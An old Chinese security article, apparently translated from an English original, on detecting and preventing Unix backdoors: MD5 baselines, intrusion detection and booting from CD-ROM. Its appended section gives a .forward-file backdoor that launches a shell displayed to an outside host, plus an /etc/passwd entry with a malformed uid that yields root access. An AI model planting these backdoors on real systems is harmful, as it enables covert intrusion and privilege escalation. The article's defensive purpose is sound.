2020智能投顾平台TOP50
全世界各行各业联合起来,internet一定要实现!
老文章正文

小心:看清系统后门的真面目

2004-06-16 eNet&Ciweek

  评估

  首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之 .许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的 安 全补丁的话,许多公司将大大提高安全性.

  MD5基准线

  一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入 侵前由干净 系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也 被合并进去了 .一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多 包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因 为他们恢复系 统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.

  入侵检测

  随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要. 以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于 实 时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判 断是 否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号? 取数据进 行进一 步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或 者是否 装载加密shell会话.

  从CD-ROM启动

  一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.

  警告 由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击 和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不 懈的努力! ( Be aware that no defense is foolproof, and that there is no substitu te for diligent attention. 此句该如何翻译? :( )

  you may want to add:

  forward Backdoor

  On Unix machines, placing commands into the .forward file was also

  a common method of regaining access. For the account ``username

  a .forward file might be constructed as follows:

    \username

     "/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

  permutations of this method include alteration of the systems mail ali ases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor

  preprocessing).

  PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and ser ver).

  $#@62; Using smrsh can effectively negate this backdoor (although its quite

  $#@62; possibly still a problem if you allow things like elms filter or

  $#@62; procmail which can run programs themselves...).

  你也许要增加:

  .forward后门

  Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户usernam e 的 .forward可能设置如下:

  \username

   "/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

  这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后). $#@62;利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elms filter或 procmail$#@62;类程序, 很有可能还有问题

  ......)

  ( 此段的内容理解不深, 故付上英文, 请指教! )

  你也许能用这个"特性"做后门:

  当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能 检查出这个错误 的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权 利.

   例子:

   rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,这将把用户 rmartin的uid设为0.

  

相关频道: eNews 老文章

您对本文或本站有任何意见,请在下方提交,谢谢!

投稿信箱:tougao@enet16.com
广告